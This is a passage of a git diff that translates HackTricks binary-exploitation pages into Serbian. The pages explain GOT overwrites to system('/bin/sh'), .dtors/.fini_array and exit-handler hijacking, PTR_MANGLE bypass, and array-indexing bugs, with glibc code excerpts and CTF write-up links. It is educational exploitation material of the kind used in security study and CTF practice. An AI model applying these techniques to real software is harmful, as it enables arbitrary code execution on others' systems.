overwrite the `free` GOT address to point to `system` and to write inside a chunk `"/bin/sh"`. This way when this chunk is freed, it'll execute `system("/bin/sh")`. +U eksploataciji heap-a na CTF-ima je uobičajeno moći kontrolisati sadržaj delova i u nekom trenutku čak i prepisati GOT tabelu. Jednostavna trik da se dobije RCE ako gadgeti nisu dostupni je da se prepiše `free` GOT adresa da pokazuje na `system` i da se unese u deo `"/bin/sh"`. Na ovaj način, kada se ovaj deo oslobodi, izvršiće se `system("/bin/sh")`. ### **Strlen2system** -Another common technique is to overwrite the **`strlen`** GOT address to point to **`system`**, so if this function is called with user input it's posisble to pass the string `"/bin/sh"` and get a shell. +Još jedna uobičajena tehnika je prepisivanje **`strlen`** GOT adrese da pokazuje na **`system`**, tako da ako se ova funkcija pozove sa korisničkim unosom, moguće je proslediti string `"/bin/sh"` i dobiti shell. -Moreover, if `puts` is used with user input, it's possible to overwrite the `strlen` GOT address to point to `system` and pass the string `"/bin/sh"` to get a shell because **`puts` will call `strlen` with the user input**. +Štaviše, ako se `puts` koristi sa korisničkim unosom, moguće je prepisati `strlen` GOT adresu da pokazuje na `system` i proslediti string `"/bin/sh"` da bi se dobio shell jer **`puts` će pozvati `strlen` sa korisničkim unosom**. -## **One Gadget** +## **Jedan Gadget** {{#ref}} ../rop-return-oriented-programing/ret2lib/one-gadget.md {{#endref}} -## **Abusing GOT from Heap** +## **Zloupotreba GOT iz Heap-a** -A common way to obtain RCE from a heap vulnerability is to abuse a fastbin so it's possible to add the part of the GOT table into the fast bin, so whenever that chunk is allocated it'll be possible to **overwrite the pointer of a function, usually `free`**.\ -Then, pointing `free` to `system` and freeing a chunk where was written `/bin/sh\x00` will execute a shell. +Uobičajen način da se dobije RCE iz ranjivosti heap-a je zloupotreba fastbin-a tako da je moguće dodati deo GOT tabele u fast bin, tako da kad god se taj deo alocira, biće moguće **prepisati pokazivač funkcije, obično `free`**.\ +Zatim, usmeravanje `free` na `system` i oslobađanje dela gde je napisan `/bin/sh\x00` izvršiće shell. -It's possible to find an [**example here**](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/chunk_extend_overlapping/#hitcon-trainging-lab13)**.** +Moguće je pronaći [**primer ovde**](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/chunk_extend_overlapping/#hitcon-trainging-lab13)**.** -## **Protections** +## **Zaštite** -The **Full RELRO** protection is meant to protect agains this kind of technique by resolving all the addresses of the functions when the binary is started and making the **GOT table read only** after it: +Zaštita **Full RELRO** je namenjena zaštiti od ove vrste tehnike rešavanjem svih adresa funkcija kada se binarna datoteka pokrene i čineći **GOT tabelu samo za čitanje** nakon toga: {{#ref}} ../common-binary-protections-and-bypasses/relro.md {{#endref}} -## References +## Reference - [https://ir0nstone.gitbook.io/notes/types/stack/got-overwrite/exploiting-a-got-overwrite](https://ir0nstone.gitbook.io/notes/types/stack/got-overwrite/exploiting-a-got-overwrite) - [https://ir0nstone.gitbook.io/notes/types/stack/one-gadgets-and-malloc-hook](https://ir0nstone.gitbook.io/notes/types/stack/one-gadgets-and-malloc-hook) diff --git a/src/binary-exploitation/arbitrary-write-2-exec/www2exec-.dtors-and-.fini_array.md b/src/binary-exploitation/arbitrary-write-2-exec/www2exec-.dtors-and-.fini_array.md index 31e45fba4..670f419c3 100644 --- a/src/binary-exploitation/arbitrary-write-2-exec/www2exec-.dtors-and-.fini_array.md +++ b/src/binary-exploitation/arbitrary-write-2-exec/www2exec-.dtors-and-.fini_array.md @@ -5,52 +5,48 @@ ## .dtors > [!CAUTION] -> Nowadays is very **weird to find a binary with a .dtors section!** +> Danas je veoma **čudno pronaći binarni fajl sa .dtors sekcijom!** -The destructors are functions that are **executed before program finishes** (after the `main` function returns).\ -The addresses to these functions are stored inside the **`.dtors`** section of the binary and therefore, if you manage to **write** the **address** to a **shellcode** in **`__DTOR_END__`** , that will be **executed** before the programs ends. - -Get the address of this section with: +Destruktori su funkcije koje se **izvršavaju pre nego što program završi** (nakon što `main` funkcija vrati).\ +Adrese ovih funkcija se čuvaju unutar **`.dtors`** sekcije binarnog fajla i stoga, ako uspete da **napišete** **adresu** u **shellcode** u **`__DTOR_END__`**, to će biti **izvršeno** pre nego što program završi. +Dobijte adresu ove sekcije sa: ```bash objdump -s -j .dtors /exec rabin -s /exec | grep “__DTOR” ``` - -Usually you will find the **DTOR** markers **between** the values `ffffffff` and `00000000`. So if you just see those values, it means that there **isn't any function registered**. So **overwrite** the **`00000000`** with the **address** to the **shellcode** to execute it. +Obično ćete pronaći **DTOR** oznake **između** vrednosti `ffffffff` i `00000000`. Dakle, ako samo vidite te vrednosti, to znači da **nema registrovane funkcije**. Tako **prepišite** **`00000000`** sa **adresom** do **shellcode** da biste ga izvršili. > [!WARNING] -> Ofc, you first need to find a **place to store the shellcode** in order to later call it. +> Naravno, prvo morate pronaći **mesto za skladištenje shellcode** kako biste ga kasnije pozvali. ## **.fini_array** -Essentially this is a structure with **functions that will be called** before the program finishes, like **`.dtors`**. This is interesting if you can call your **shellcode just jumping to an address**, or in cases where you need to go **back to `main`** again to **exploit the vulnerability a second time**. - +U suštini, ovo je struktura sa **funkcijama koje će biti pozvane** pre nego što program završi, poput **`.dtors`**. Ovo je zanimljivo ako možete pozvati svoj **shellcode jednostavno skakanjem na adresu**, ili u slučajevima kada treba da se **vratite na `main`** ponovo da biste **iskoristili ranjivost drugi put**. ```bash objdump -s -j .fini_array ./greeting ./greeting: file format elf32-i386 Contents of section .fini_array: - 8049934 a0850408 +8049934 a0850408 #Put your address in 0x8049934 ``` +Napomena da kada se funkcija iz **`.fini_array`** izvrši, prelazi se na sledeću, tako da se neće izvršavati više puta (sprečavanje večitih petlji), ali će takođe dati samo 1 **izvršenje funkcije** postavljene ovde. -Note that when a function from the **`.fini_array`** is executed it moves to the next one, so it won't be executed several time (preventing eternal loops), but also it'll only give you 1 **execution of the function** placed here. +Napomena da se unosi u **`.fini_array`** pozivaju u **obrnutom** redosledu, tako da verovatno želite da počnete da pišete od poslednjeg. -Note that entries in `.fini_array` are called in **reverse** order, so you probably wants to start writing from the last one. +#### Večna petlja -#### Eternal loop +Da biste iskoristili **`.fini_array`** za dobijanje večite petlje, možete [**proveriti šta je ovde urađeno**](https://guyinatuxedo.github.io/17-stack_pivot/insomnihack18_onewrite/index.html)**:** Ako imate najmanje 2 unosa u **`.fini_array`**, možete: -In order to abuse **`.fini_array`** to get an eternal loop you can [**check what was done here**](https://guyinatuxedo.github.io/17-stack_pivot/insomnihack18_onewrite/index.html)**:** If you have at least 2 entries in **`.fini_array`**, you can: - -- Use your first write to **call the vulnerable arbitrary write function** again -- Then, calculate the return address in the stack stored by **`__libc_csu_fini`** (the function that is calling all the `.fini_array` functions) and put there the **address of `__libc_csu_fini`** - - This will make **`__libc_csu_fini`** call himself again executing the **`.fini_array`** functions again which will call the vulnerable WWW function 2 times: one for **arbitrary write** and another one to overwrite again the **return address of `__libc_csu_fini`** on the stack to call itself again. +- Iskoristiti svoje prvo pisanje da ponovo **pozovete ranjivu funkciju za proizvoljno pisanje** +- Zatim, izračunati adresu povratka na steku koju čuva **`__libc_csu_fini`** (funkcija koja poziva sve funkcije iz **`.fini_array`**) i staviti tamo **adresu `__libc_csu_fini`** +- Ovo će učiniti da **`__libc_csu_fini`** ponovo pozove sebe izvršavajući funkcije iz **`.fini_array`** ponovo, što će pozvati ranjivu WWW funkciju 2 puta: jednom za **proizvoljno pisanje** i još jednom da ponovo prepiše **adresu povratka `__libc_csu_fini`** na steku da bi se ponovo pozvao. > [!CAUTION] -> Note that with [**Full RELRO**](../common-binary-protections-and-bypasses/relro.md)**,** the section **`.fini_array`** is made **read-only**. -> In newer versions, even with [**Partial RELRO**] the section **`.fini_array`** is made **read-only** also. +> Napomena da sa [**Full RELRO**](../common-binary-protections-and-bypasses/relro.md)**,** sekcija **`.fini_array`** je postavljena na **samo za čitanje**. +> U novijim verzijama, čak i sa [**Partial RELRO**] sekcija **`.fini_array`** je takođe postavljena na **samo za čitanje**. {{#include ../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/arbitrary-write-2-exec/www2exec-atexit.md b/src/binary-exploitation/arbitrary-write-2-exec/www2exec-atexit.md index 97c286231..78ad7d59a 100644 --- a/src/binary-exploitation/arbitrary-write-2-exec/www2exec-atexit.md +++ b/src/binary-exploitation/arbitrary-write-2-exec/www2exec-atexit.md @@ -5,35 +5,34 @@ ## **\_\_atexit Structures** > [!CAUTION] -> Nowadays is very **weird to exploit this!** +> Danas je veoma **čudno iskoristiti ovo!** -**`atexit()`** is a function to which **other functions are passed as parameters.** These **functions** will be **executed** when executing an **`exit()`** or the **return** of the **main**.\ -If you can **modify** the **address** of any of these **functions** to point to a shellcode for example, you will **gain control** of the **process**, but this is currently more complicated.\ -Currently the **addresses to the functions** to be executed are **hidden** behind several structures and finally the address to which it points are not the addresses of the functions, but are **encrypted with XOR** and displacements with a **random key**. So currently this attack vector is **not very useful at least on x86** and **x64_86**.\ -The **encryption function** is **`PTR_MANGLE`**. **Other architectures** such as m68k, mips32, mips64, aarch64, arm, hppa... **do not implement the encryption** function because it **returns the same** as it received as input. So these architectures would be attackable by this vector. +**`atexit()`** je funkcija kojoj se **prolaze druge funkcije kao parametri.** Ove **funkcije** će biti **izvršene** prilikom izvršavanja **`exit()`** ili **povratka** iz **main**.\ +Ako možete **modifikovati** **adresu** bilo koje od ovih **funkcija** da pokazuje na shellcode na primer, dobićete **kontrolu** nad **procesom**, ali je to trenutno komplikovanije.\ +Trenutno su **adrese funkcija** koje treba izvršiti **sakrivene** iza nekoliko struktura i konačno adresa na koju pokazuje nije adresa funkcija, već je **kriptovana sa XOR** i pomeranjima sa **nasumičnim ključem**. Tako da je trenutno ovaj napadni vektor **ne baš koristan barem na x86** i **x64_86**.\ +**Funkcija kriptovanja** je **`PTR_MANGLE`**. **Druge arhitekture** kao što su m68k, mips32, mips64, aarch64, arm, hppa... **ne implementiraju funkciju kriptovanja** jer **vraća isto** što je primila kao ulaz. Tako da bi ove arhitekture bile napadljive ovim vektorom. -You can find an in depth explanation on how this works in [https://m101.github.io/binholic/2017/05/20/notes-on-abusing-exit-handlers.html](https://m101.github.io/binholic/2017/05/20/notes-on-abusing-exit-handlers.html) +Možete pronaći detaljno objašnjenje o tome kako ovo funkcioniše na [https://m101.github.io/binholic/2017/05/20/notes-on-abusing-exit-handlers.html](https://m101.github.io/binholic/2017/05/20/notes-on-abusing-exit-handlers.html) ## link_map -As explained [**in this post**](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#2---targetting-ldso-link_map-structure), If the program exits using `return` or `exit()` it'll run `__run_exit_handlers()` which will call registered destructors. +Kao što je objašnjeno [**u ovom postu**](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#2---targetting-ldso-link_map-structure), Ako program završi koristeći `return` ili `exit()` pokrenuće `__run_exit_handlers()` koji će pozvati registrovane destruktore. > [!CAUTION] -> If the program exits via **`_exit()`** function, it'll call the **`exit` syscall** and the exit handlers will not be executed. So, to confirm `__run_exit_handlers()` is executed you can set a breakpoint on it. - -The important code is ([source](https://elixir.bootlin.com/glibc/glibc-2.32/source/elf/dl-fini.c#L131)): +> Ako program završi putem **`_exit()`** funkcije, pozvaće **`exit` syscall** i izlazni handleri neće biti izvršeni. Dakle, da biste potvrdili da je `__run_exit_handlers()` izvršen, možete postaviti breakpoint na njega. +Važan kod je ([source](https://elixir.bootlin.com/glibc/glibc-2.32/source/elf/dl-fini.c#L131)): ```c ElfW(Dyn) *fini_array = map->l_info[DT_FINI_ARRAY]; if (fini_array != NULL) - { - ElfW(Addr) *array = (ElfW(Addr) *) (map->l_addr + fini_array->d_un.d_ptr); - size_t sz = (map->l_info[DT_FINI_ARRAYSZ]->d_un.d_val / sizeof (ElfW(Addr))); +{ +ElfW(Addr) *array = (ElfW(Addr) *) (map->l_addr + fini_array->d_un.d_ptr); +size_t sz = (map->l_info[DT_FINI_ARRAYSZ]->d_un.d_val / sizeof (ElfW(Addr))); - while (sz-- > 0) - ((fini_t) array[sz]) (); - } - [...] +while (sz-- > 0) +((fini_t) array[sz]) (); +} +[...] @@ -41,198 +40,187 @@ if (fini_array != NULL) // This is the d_un structure ptype l->l_info[DT_FINI_ARRAY]->d_un type = union { - Elf64_Xword d_val; // address of function that will be called, we put our onegadget here - Elf64_Addr d_ptr; // offset from l->l_addr of our structure +Elf64_Xword d_val; // address of function that will be called, we put our onegadget here +Elf64_Addr d_ptr; // offset from l->l_addr of our structure } ``` +Napomena kako `map -> l_addr + fini_array -> d_un.d_ptr` se koristi za **izračunavanje** pozicije **niza funkcija koje treba pozvati**. -Note how `map -> l_addr + fini_array -> d_un.d_ptr` is used to **calculate** the position of the **array of functions to call**. +Postoji **nekoliko opcija**: -There are a **couple of options**: - -- Overwrite the value of `map->l_addr` to make it point to a **fake `fini_array`** with instructions to execute arbitrary code -- Overwrite `l_info[DT_FINI_ARRAY]` and `l_info[DT_FINI_ARRAYSZ]` entries (which are more or less consecutive in memory) , to make them **points to a forged `Elf64_Dyn`** structure that will make again **`array` points to a memory** zone the attacker controlled. - - [**This writeup**](https://github.com/nobodyisnobody/write-ups/tree/main/DanteCTF.2023/pwn/Sentence.To.Hell) overwrites `l_info[DT_FINI_ARRAY]` with the address of a controlled memory in `.bss` containing a fake `fini_array`. This fake array contains **first a** [**one gadget**](../rop-return-oriented-programing/ret2lib/one-gadget.md) **address** which will be executed and then the **difference** between in the address of this **fake array** and the v**alue of `map->l_addr`** so `*array` will point to the fake array. - - According to main post of this technique and [**this writeup**](https://activities.tjhsst.edu/csc/writeups/angstromctf-2021-wallstreet) ld.so leave a pointer on the stack that points to the binary `link_map` in ld.so. With an arbitrary write it's possible to overwrite it and make it point to a fake `fini_array` controlled by the attacker with the address to a [**one gadget**](../rop-return-oriented-programing/ret2lib/one-gadget.md) for example. - -Following the previous code you can find another interesting section with the code: +- Prepisati vrednost `map->l_addr` da pokazuje na **lažni `fini_array`** sa instrukcijama za izvršavanje proizvoljnog koda +- Prepisati `l_info[DT_FINI_ARRAY]` i `l_info[DT_FINI_ARRAYSZ]` unose (koji su više-manje uzastopni u memoriji), da ih **usmerite na falsifikovanu `Elf64_Dyn`** strukturu koja će ponovo **`array` usmeriti na memorijsku** zonu koju kontroliše napadač. +- [**Ova analiza**](https://github.com/nobodyisnobody/write-ups/tree/main/DanteCTF.2023/pwn/Sentence.To.Hell) prepisuje `l_info[DT_FINI_ARRAY]` sa adresom kontrolisane memorije u `.bss` koja sadrži lažni `fini_array`. Ovaj lažni niz sadrži **prvo** [**jednu napravu**](../rop-return-oriented-programing/ret2lib/one-gadget.md) **adresu** koja će biti izvršena, a zatim **razliku** između adrese ovog **lažnog niza** i **vrednosti `map->l_addr`** tako da `*array` pokazuje na lažni niz. +- Prema glavnom postu ove tehnike i [**ovoj analizi**](https://activities.tjhsst.edu/csc/writeups/angstromctf-2021-wallstreet) ld.so ostavlja pokazivač na steku koji pokazuje na binarni `link_map` u ld.so. Sa proizvoljnim pisanjem moguće je prepisati ga i usmeriti na lažni `fini_array` koji kontroliše napadač sa adresom do [**jedne naprave**](../rop-return-oriented-programing/ret2lib/one-gadget.md) na primer. +Iza prethodnog koda možete pronaći još jedan zanimljiv odeljak sa kodom: ```c /* Next try the old-style destructor. */ ElfW(Dyn) *fini = map->l_info[DT_FINI]; if (fini != NULL) - DL_CALL_DT_FINI (map, ((void *) map->l_addr + fini->d_un.d_ptr)); +DL_CALL_DT_FINI (map, ((void *) map->l_addr + fini->d_un.d_ptr)); } ``` +U ovom slučaju bi bilo moguće prepisati vrednost `map->l_info[DT_FINI]` koja pokazuje na lažnu `ElfW(Dyn)` strukturu. Pronađite [**više informacija ovde**](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#2---targetting-ldso-link_map-structure). -In this case it would be possible to overwrite the value of `map->l_info[DT_FINI]` pointing to a forged `ElfW(Dyn)` structure. Find [**more information here**](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#2---targetting-ldso-link_map-structure). +## TLS-Storage dtor_list prepisivanje u **`__run_exit_handlers`** -## TLS-Storage dtor_list overwrite in **`__run_exit_handlers`** - -As [**explained here**](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#5---code-execution-via-tls-storage-dtor_list-overwrite), if a program exits via `return` or `exit()`, it'll execute **`__run_exit_handlers()`** which will call any destructors function registered. - -Code from `_run_exit_handlers()`: +Kao što je [**objašnjeno ovde**](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#5---code-execution-via-tls-storage-dtor_list-overwrite), ako program završi putem `return` ili `exit()`, izvršiće **`__run_exit_handlers()`** koja će pozvati sve funkcije destruktora koje su registrovane. +Kod iz `_run_exit_handlers()`: ```c /* Call all functions registered with `atexit' and `on_exit', - in the reverse of the order in which they were registered - perform stdio cleanup, and terminate program execution with STATUS. */ +in the reverse of the order in which they were registered +perform stdio cleanup, and terminate program execution with STATUS. */ void attribute_hidden __run_exit_handlers (int status, struct exit_function_list **listp, - bool run_list_atexit, bool run_dtors) +bool run_list_atexit, bool run_dtors) { - /* First, call the TLS destructors. */ +/* First, call the TLS destructors. */ #ifndef SHARED - if (&__call_tls_dtors != NULL) +if (&__call_tls_dtors != NULL) #endif - if (run_dtors) - __call_tls_dtors (); +if (run_dtors) +__call_tls_dtors (); ``` - -Code from **`__call_tls_dtors()`**: - +Kod iz **`__call_tls_dtors()`**: ```c typedef void (*dtor_func) (void *); struct dtor_list //struct added { - dtor_func func; - void *obj; - struct link_map *map; - struct dtor_list *next; +dtor_func func; +void *obj; +struct link_map *map; +struct dtor_list *next; }; [...] /* Call the destructors. This is called either when a thread returns from the - initial function or when the process exits via the exit function. */ +initial function or when the process exits via the exit function. */ void __call_tls_dtors (void) { - while (tls_dtor_list) // parse the dtor_list chained structures - { - struct dtor_list *cur = tls_dtor_list; // cur point to tls-storage dtor_list - dtor_func func = cur->func; - PTR_DEMANGLE (func); // demangle the function ptr +while (tls_dtor_list) // parse the dtor_list chained structures +{ +struct dtor_list *cur = tls_dtor_list; // cur point to tls-storage dtor_list +dtor_func func = cur->func; +PTR_DEMANGLE (func); // demangle the function ptr - tls_dtor_list = tls_dtor_list->next; // next dtor_list structure - func (cur->obj); - [...] - } +tls_dtor_list = tls_dtor_list->next; // next dtor_list structure +func (cur->obj); +[...] +} } ``` +Za svaku registrovanu funkciju u **`tls_dtor_list`**, demangliraće pokazivač iz **`cur->func`** i pozvati ga sa argumentom **`cur->obj`**. -For each registered function in **`tls_dtor_list`**, it'll demangle the pointer from **`cur->func`** and call it with the argument **`cur->obj`**. - -Using the **`tls`** function from this [**fork of GEF**](https://github.com/bata24/gef), it's possible to see that actually the **`dtor_list`** is very **close** to the **stack canary** and **PTR_MANGLE cookie**. So, with an overflow on it's it would be possible to **overwrite** the **cookie** and the **stack canary**.\ -Overwriting the PTR_MANGLE cookie, it would be possible to **bypass the `PTR_DEMANLE` function** by setting it to 0x00, will mean that the **`xor`** used to get the real address is just the address configured. Then, by writing on the **`dtor_list`** it's possible **chain several functions** with the function **address** and it's **argument.** - -Finally notice that the stored pointer is not only going to be xored with the cookie but also rotated 17 bits: +Koristeći **`tls`** funkciju iz ovog [**fork-a GEF**](https://github.com/bata24/gef), moguće je videti da je zapravo **`dtor_list`** veoma **blizu** **stack canary** i **PTR_MANGLE cookie**. Dakle, sa prelivanjem na njemu bilo bi moguće **prepisati** **cookie** i **stack canary**.\ +Prepisivanjem PTR_MANGLE cookie-a, bilo bi moguće **obići `PTR_DEMANLE` funkciju** postavljanjem na 0x00, što će značiti da je **`xor`** korišćen za dobijanje pravog adresa samo adresa koja je konfigurisana. Zatim, pisanjem na **`dtor_list`** moguće je **povezati nekoliko funkcija** sa **adresom funkcije** i njenim **argumentom**. +Na kraju, primetite da se sačuvani pokazivač ne samo da će biti xored sa cookie-jem, već će biti i rotiran 17 bita: ```armasm 0x00007fc390444dd4 <+36>: mov rax,QWORD PTR [rbx] --> mangled ptr 0x00007fc390444dd7 <+39>: ror rax,0x11 --> rotate of 17 bits 0x00007fc390444ddb <+43>: xor rax,QWORD PTR fs:0x30 --> xor with PTR_MANGLE ``` +Tako da treba da uzmete ovo u obzir pre nego što dodate novu adresu. -So you need to take this into account before adding a new address. +Pronađite primer u [**originalnom postu**](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#5---code-execution-via-tls-storage-dtor_list-overwrite). -Find an example in the [**original post**](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#5---code-execution-via-tls-storage-dtor_list-overwrite). +## Ostali izmenjeni pokazivači u **`__run_exit_handlers`** -## Other mangled pointers in **`__run_exit_handlers`** - -This technique is [**explained here**](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#5---code-execution-via-tls-storage-dtor_list-overwrite) and depends again on the program **exiting calling `return` or `exit()`** so **`__run_exit_handlers()`** is called. - -Let's check more code of this function: +Ova tehnika je [**objašnjena ovde**](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#5---code-execution-via-tls-storage-dtor_list-overwrite) i ponovo zavisi od toga da program **izlazi pozivajući `return` ili `exit()`** tako da se **`__run_exit_handlers()`** poziva. +Hajde da proverimo više koda ove funkcije: ```c - while (true) - { - struct exit_function_list *cur; +while (true) +{ +struct exit_function_list *cur; - restart: - cur = *listp; +restart: +cur = *listp; - if (cur == NULL) - { - /* Exit processing complete. We will not allow any more - atexit/on_exit registrations. */ - __exit_funcs_done = true; - break; - } +if (cur == NULL) +{ +/* Exit processing complete. We will not allow any more +atexit/on_exit registrations. */ +__exit_funcs_done = true; +break; +} - while (cur->idx > 0) - { - struct exit_function *const f = &cur->fns[--cur->idx]; - const uint64_t new_exitfn_called = __new_exitfn_called; +while (cur->idx > 0) +{ +struct exit_function *const f = &cur->fns[--cur->idx]; +const uint64_t new_exitfn_called = __new_exitfn_called; - switch (f->flavor) - { - void (*atfct) (void); - void (*onfct) (int status, void *arg); - void (*cxafct) (void *arg, int status); - void *arg; +switch (f->flavor) +{ +void (*atfct) (void); +void (*onfct) (int status, void *arg); +void (*cxafct) (void *arg, int status); +void *arg; - case ef_free: - case ef_us: - break; - case ef_on: - onfct = f->func.on.fn; - arg = f->func.on.arg; - PTR_DEMANGLE (onfct); +case ef_free: +case ef_us: +break; +case ef_on: +onfct = f->func.on.fn; +arg = f->func.on.arg; +PTR_DEMANGLE (onfct); - /* Unlock the list while we call a foreign function. */ - __libc_lock_unlock (__exit_funcs_lock); - onfct (status, arg); - __libc_lock_lock (__exit_funcs_lock); - break; - case ef_at: - atfct = f->func.at; - PTR_DEMANGLE (atfct); +/* Unlock the list while we call a foreign function. */ +__libc_lock_unlock (__exit_funcs_lock); +onfct (status, arg); +__libc_lock_lock (__exit_funcs_lock); +break; +case ef_at: +atfct = f->func.at; +PTR_DEMANGLE (atfct); - /* Unlock the list while we call a foreign function. */ - __libc_lock_unlock (__exit_funcs_lock); - atfct (); - __libc_lock_lock (__exit_funcs_lock); - break; - case ef_cxa: - /* To avoid dlclose/exit race calling cxafct twice (BZ 22180), - we must mark this function as ef_free. */ - f->flavor = ef_free; - cxafct = f->func.cxa.fn; - arg = f->func.cxa.arg; - PTR_DEMANGLE (cxafct); +/* Unlock the list while we call a foreign function. */ +__libc_lock_unlock (__exit_funcs_lock); +atfct (); +__libc_lock_lock (__exit_funcs_lock); +break; +case ef_cxa: +/* To avoid dlclose/exit race calling cxafct twice (BZ 22180), +we must mark this function as ef_free. */ +f->flavor = ef_free; +cxafct = f->func.cxa.fn; +arg = f->func.cxa.arg; +PTR_DEMANGLE (cxafct); - /* Unlock the list while we call a foreign function. */ - __libc_lock_unlock (__exit_funcs_lock); - cxafct (arg, status); - __libc_lock_lock (__exit_funcs_lock); - break; - } +/* Unlock the list while we call a foreign function. */ +__libc_lock_unlock (__exit_funcs_lock); +cxafct (arg, status); +__libc_lock_lock (__exit_funcs_lock); +break; +} - if (__glibc_unlikely (new_exitfn_called != __new_exitfn_called)) - /* The last exit function, or another thread, has registered - more exit functions. Start the loop over. */ - goto restart; - } +if (__glibc_unlikely (new_exitfn_called != __new_exitfn_called)) +/* The last exit function, or another thread, has registered +more exit functions. Start the loop over. */ +goto restart; +} - *listp = cur->next; - if (*listp != NULL) - /* Don't free the last element in the chain, this is the statically - allocate element. */ - free (cur); - } +*listp = cur->next; +if (*listp != NULL) +/* Don't free the last element in the chain, this is the statically +allocate element. */ +free (cur); +} - __libc_lock_unlock (__exit_funcs_lock); +__libc_lock_unlock (__exit_funcs_lock); ``` +Promenljiva `f` pokazuje na **`initial`** strukturu i u zavisnosti od vrednosti `f->flavor` biće pozvane različite funkcije.\ +U zavisnosti od vrednosti, adresa funkcije koja će biti pozvana biće na drugom mestu, ali će uvek biti **demangled**. -The variable `f` points to the **`initial`** structure and depending on the value of `f->flavor` different functions will be called.\ -Depending on the value, the address of the function to call will be in a different place, but it'll always be **demangled**. +Pored toga, u opcijama **`ef_on`** i **`ef_cxa`** takođe je moguće kontrolisati **argument**. -Moreover, in the options **`ef_on`** and **`ef_cxa`** it's also possible to control an **argument**. +Moguće je proveriti **`initial` strukturu** u sesiji debagovanja sa GEF pokrenutim **`gef> p initial`**. -It's possible to check the **`initial` structure** in a debugging session with GEF running **`gef> p initial`**. - -To abuse this you need either to **leak or erase the `PTR_MANGLE`cookie** and then overwrite a `cxa` entry in initial with `system('/bin/sh')`.\ -You can find an example of this in the [**original blog post about the technique**](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#6---code-execution-via-other-mangled-pointers-in-initial-structure). +Da bi se ovo iskoristilo, potrebno je ili **leak** ili obrisati `PTR_MANGLE` kolačić i zatim prepisati `cxa` unos u initial sa `system('/bin/sh')`.\ +Možete pronaći primer ovoga u [**originalnom blog postu o tehnici**](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#6---code-execution-via-other-mangled-pointers-in-initial-structure). {{#include ../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/array-indexing.md b/src/binary-exploitation/array-indexing.md index 675eb939e..188d35e12 100644 --- a/src/binary-exploitation/array-indexing.md +++ b/src/binary-exploitation/array-indexing.md @@ -1,18 +1,18 @@ -# Array Indexing +# Indeksiranje Niza {{#include ../banners/hacktricks-training.md}} -## Basic Information +## Osnovne Informacije -This category includes all vulnerabilities that occur because it is possible to overwrite certain data through errors in the handling of indexes in arrays. It's a very wide category with no specific methodology as the exploitation mechanism relays completely on the conditions of the vulnerability. +Ova kategorija obuhvata sve ranjivosti koje se javljaju zbog mogućnosti prepisivanja određenih podataka kroz greške u rukovanju indeksima u nizovima. To je veoma široka kategorija bez specifične metodologije, jer mehanizam eksploatacije potpuno zavisi od uslova ranjivosti. -However he you can find some nice **examples**: +Međutim, ovde možete pronaći neke lepe **primere**: - [https://guyinatuxedo.github.io/11-index/swampctf19_dreamheaps/index.html](https://guyinatuxedo.github.io/11-index/swampctf19_dreamheaps/index.html) - - There are **2 colliding arrays**, one for **addresses** where data is stored and one with the **sizes** of that data. It's possible to overwrite one from the other, enabling to write an arbitrary address indicating it as a size. This allows to write the address of the `free` function in the GOT table and then overwrite it with the address to `system`, and call free from a memory with `/bin/sh`. +- Postoje **2 kolidirajuća niza**, jedan za **adrese** gde su podaci sačuvani i jedan sa **veličinama** tih podataka. Moguće je prepisati jedan iz drugog, omogućavajući pisanje proizvoljne adrese označavajući je kao veličinu. Ovo omogućava pisanje adrese `free` funkcije u GOT tabeli, a zatim je prepisivanje adresom `system`, i pozivanje free iz memorije sa `/bin/sh`. - [https://guyinatuxedo.github.io/11-index/csaw18_doubletrouble/index.html](https://guyinatuxedo.github.io/11-index/csaw18_doubletrouble/index.html) - - 64 bits, no nx. Overwrite a size to get a kind of buffer overflow where every thing is going to be used a double number and sorted from smallest to biggest so it's needed to create a shellcode that fulfil that requirement, taking into account that the canary shouldn't be moved from it's position and finally overwriting the RIP with an address to ret, that fulfil he previous requirements and putting the biggest address a new address pointing to the start of the stack (leaked by the program) so it's possible to use the ret to jump there. +- 64 bita, bez nx. Prepisivanje veličine da bi se dobio neki oblik buffer overflow-a gde će sve biti korišćeno kao dupli broj i sortirano od najmanjeg do najvećeg, tako da je potrebno kreirati shellcode koji ispunjava taj zahtev, uzimajući u obzir da se kanar ne sme pomerati sa svoje pozicije i konačno prepisivanje RIP-a sa adresom za ret, koja ispunjava prethodne zahteve i postavljanje najveće adrese na novu adresu koja pokazuje na početak steka (procurila od programa) tako da je moguće koristiti ret da se skoči tamo. - [https://faraz.faith/2019-10-20-secconctf-2019-sum/](https://faraz.faith/2019-10-20-secconctf-2019-sum/) - - 64bits, no relro, canary, nx, no pie. There is an off-by-one in an array in the stack that allows to control a pointer granting WWW (it write the sum of all the numbers of the array in the overwritten address by the of-by-one in the array). The stack is controlled so the GOT `exit` address is overwritten with `pop rdi; ret`, and in the stack is added the address to `main` (looping back to `main`). The a ROP chain to leak the address of put in the GOT using puts is used (`exit` will be called so it will call `pop rdi; ret` therefore executing this chain in the stack). Finally a new ROP chain executing ret2lib is used. +- 64 bita, bez relro, kanar, nx, bez pie. Postoji off-by-one u nizu na steku koji omogućava kontrolu pokazivača dodeljujući WWW (upisuje sumu svih brojeva niza u prepisanu adresu zbog off-by-one u nizu). Stek je kontrolisan tako da je GOT `exit` adresa prepisana sa `pop rdi; ret`, a na stek je dodata adresa za `main` (ponovno se vraća na `main`). Koristi se ROP lanac za procurivanje adrese stavljene u GOT koristeći puts (`exit` će biti pozvan tako da će pozvati `pop rdi; ret`, stoga izvršavajući 